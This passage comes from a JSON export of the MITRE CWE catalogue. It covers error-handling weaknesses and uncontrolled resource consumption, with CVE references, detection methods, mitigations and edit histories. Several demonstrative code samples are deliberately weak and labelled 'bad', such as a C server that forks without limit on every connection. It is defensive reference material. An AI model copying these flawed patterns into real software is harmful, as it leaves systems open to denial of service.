Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1395","Description":"Certain packets (zero byte and other lengths) cause a recvfrom call to produce an unexpected return code that causes a server\'s listening loop to exit.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1395"},{"Reference":"CVE-2002-2124","Description":"Unchecked return code from recv() leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2124"},{"Reference":"CVE-2005-2553","Description":"Kernel function does not properly handle when a null is returned by a function call, causing it to call another function that it shouldn\'t.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2553"},{"Reference":"CVE-2005-1858","Description":"Memory not properly cleared when read() function call returns fewer bytes than expected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858"},{"Reference":"CVE-2000-0536","Description":"Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0536"},{"Reference":"CVE-2001-0910","Description":"Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0910"},{"Reference":"CVE-2004-2371","Description":"Game server doesn\'t check return values for functions that handle text strings and associated size values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2371"},{"Reference":"CVE-2005-1267","Description":"Resultant infinite loop when function call returns -1 value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1267"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unexpected Status Code or Return Value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP00-PL","Entry_Name":"Do not return undef","Mapping_Fit":"Imprecise"}]},"Notes":{"Note":{"#text":"Usually primary, but can be resultant from issues such as behavioral change or API abuse. This can produce resultant vulnerabilities.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"395":{"attr":{"@_ID":"395","@_Name":"Use of NullPointerException Catch to Detect NULL Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer.","Extended_Description":{"xhtml:p":["Programmers typically catch NullPointerException under three circumstances:","Of these three circumstances, only the last is acceptable."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The program contains a null pointer dereference. Catching the resulting exception was easier than fixing the underlying problem.","The program explicitly throws a NullPointerException to signal an error condition.","The code is part of a test harness that supplies unexpected input to the classes under test."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Framework-based Fuzzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not extensively rely on catching exceptions (especially for validating user input) to handle errors. Handling exceptions can decrease the performance of an application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code mistakenly catches a NullPointerException.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (NullPointerException npe) {}","xhtml:div":[{"#text":"mysteryMethod();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":""}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Catching NullPointerException"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Catch NullPointerException","attr":{"@_Date":"2008-04-11"}}}},"396":{"attr":{"@_ID":"396","@_Name":"Declaration of Catch for Generic Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.","Extended_Description":"Multiple catch blocks can get ugly and repetitive, but \\"condensing\\" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of Java\'s typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt handles three types of exceptions in an identical fashion.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}catch (InvocationTargetException e) {}catch (SQLException e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"doExchange failed\\", e);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logger.error(\\"doExchange failed\\", e);","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logger.error(\\"doExchange failed\\", e);","xhtml:br":""}}],"xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"try {}catch (Exception e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"doExchange failed\\", e);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"Body_Text":["At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows:","However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer\'s intent."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Overly-Broad Catch Block"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP5","Entry_Name":"Ambiguous Exception Type"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-396"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-396"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 9: Catching Exceptions.&#34; Page 157"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-396"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-396"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Overly-Broad Catch Block","attr":{"@_Date":"2008-04-11"}}}},"397":{"attr":{"@_ID":"397","@_Name":"Declaration of Throws for Generic Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.","Extended_Description":"Declaring a method to throw Exception or Throwable makes it difficult for callers to perform proper error handling and error recovery. Java\'s exception mechanism, for example, is set up to make it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following method throws three types of exceptions.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void doExchange() throws IOException, InvocationTargetException, SQLException {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"public void doExchange() throws Exception {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["While it might seem tidier to write","doing so hampers the caller\'s ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement."]},{"Intro_Text":"Early versions of C++ (C++98, C++03, C++11) included a feature known as Dynamic Exception Specification. This allowed functions to declare what type of exceptions it may throw. It is possible to declare a general class of exception to cover any derived exceptions that may be throw.","Example_Code":{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"int myfunction() throw(std::exception) {}","xhtml:div":{"#text":"if (0) throw out_of_range();throw length_error();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"In the example above, the code declares that myfunction() can throw an exception of type \\"std::exception\\" thus hiding details about the possible derived exceptions that could potentially be thrown."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Overly-Broad Throws Declaration"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR07-J","Entry_Name":"Do not throw RuntimeException, Exception, or Throwable"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP5","Entry_Name":"Ambiguous Exception Type"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-397"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-397"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-397"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-397"}}]},"Notes":{"Note":{"#text":"For C++, this weakness only applies to C++98, C++03, and C++11. It relies on a feature known as Dynamic Exception Specification, which was part of early versions of C++ but was deprecated in C++11. It has been removed for C++17 and later.","attr":{"@_Type":"Applicable Platform"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Overly-Broad Throws Declaration","attr":{"@_Date":"2008-04-11"}}}},"400":{"attr":{"@_ID":"400","@_Name":"Uncontrolled Resource Consumption","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.","Extended_Description":{"xhtml:p":["Limited resources include memory, file system storage, database connection pool entries, and CPU. If an attacker can trigger the allocation of these limited resources, but the number or size of the resources is not controlled, then the attacker could cause a denial of service that consumes all available resources. This would prevent valid users from accessing the software, and it could potentially have an impact on the surrounding environment. For example, a memory exhaustion attack against an application could slow down the application as well as its host operating system.","There are at least three distinct scenarios which can commonly lead to resource exhaustion:","Resource exhaustion problems are often result due to an incorrect implementation of the following situations:"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Lack of throttling for the number of allocated resources","Losing all references to a resource before reaching the shutdown stage","Not closing/returning a resource after processing"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances.","Confusion over which part of the program is responsible for releasing the resource."]}}]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Resource Exhaustion"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"The most common result of resource exhaustion is denial of service. The software may slow down, crash due to unhandled errors, or lock out legitimate users."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"In some cases it may be possible to force the software to \\"fail open\\" in the event of resource exhaustion. The state of the software -- and possibly the security functionality - may then be compromised."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis typically has limited utility in recognizing resource exhaustion problems, except for program-independent system resources such as files, sockets, and processes. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.","Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Certain automated dynamic analysis techniques may be effective in spotting resource exhaustion problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame.","Effectiveness":"Moderate"},{"Method":"Fuzzing","Description":"While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find resource exhaustion problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to handle resource exhaustion may be the cause.","Effectiveness":"Opportunistic"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Mitigation of resource exhaustion attacks requires that the target system either:","The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.","The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["recognizes the attack and denies that user further access for a given amount of time, or","uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]}}}},{"Phase":"Architecture and Design","Description":"Ensure that protocols have specific limits of scale placed on them."},{"Phase":"Implementation","Description":"Ensure that all failures in resource allocation place the system into a safe posture."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class Worker implements Executor {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...public void execute(Runnable r) {}public Worker(Channel ch, int nworkers) {}protected void activate() {}","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (InterruptedException ie) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Thread.currentThread().interrupt();","xhtml:br":["",""],"xhtml:i":"// postpone response"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Runnable loop = new Runnable() {};new Thread(loop).start();","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (InterruptedException ie) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"for (;;) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Runnable r = ...;r.run();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}}}]}}}},"Body_Text":"There are no limits to runnables. Potentially an attacker could cause resource problems very quickly."},{"attr":{"@_Demonstrative_Example_ID":"DX-25"},"Intro_Text":"This code allocates a socket and forks each time it receives a new connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {}","xhtml:br":"","xhtml:div":{"#text":"newsock=accept(sock, ...);printf(\\"A connection has been accepted\\\\n\\");pid = fork();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely."},{"attr":{"@_Demonstrative_Example_ID":"DX-50"},"Intro_Text":"In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int writeDataFromSocketToFile(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port);if (socket &lt; 0) {}if (getNextMessage(socket, filename, FILENAME_SIZE) &gt; 0) {}closeSocket(socket);","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (openFileToWrite(filename) &gt; 0) {}closeFile();","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (getNextMessage(socket, buffer, BUFFER_SIZE) &gt; 0){}","xhtml:div":{"#text":"if (!(writeToFile(buffer) &gt; 